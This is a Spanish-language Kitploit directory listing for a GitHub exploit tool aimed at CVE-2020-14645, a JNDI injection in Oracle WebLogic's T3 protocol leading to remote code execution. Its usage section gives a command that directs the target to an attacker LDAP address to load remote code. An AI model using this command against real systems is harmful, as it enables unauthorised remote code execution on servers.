Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-14645 — Exploit basado en Java para CVE-2020-14645 que ataca el protocolo T3 de Oracle WebLogic con inyección JNDI para ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/daboquan/cve-2020-14645
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

Exploit basado en Java para CVE-2020-14645 que ataca el protocolo T3 de Oracle WebLogic con inyección JNDI para ejecución remota de código.

Ver Repositorio
3hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-14645

Método de uso

Primero use NDI-Injection-Exploit para escuchar y generar una dirección ldap.

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Tatget y -RMI son obligatorios, https puede usar el parámetro --SSL, -Port por defecto 7001.

Para compilarlo usted mismo, necesita agregar coherence.jar y wlfullclient.jar.

Referencia de vulnerabilidad:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

Referencia de código:

https://github.com/Y4er/CVE-2020-2883

Descargar herramienta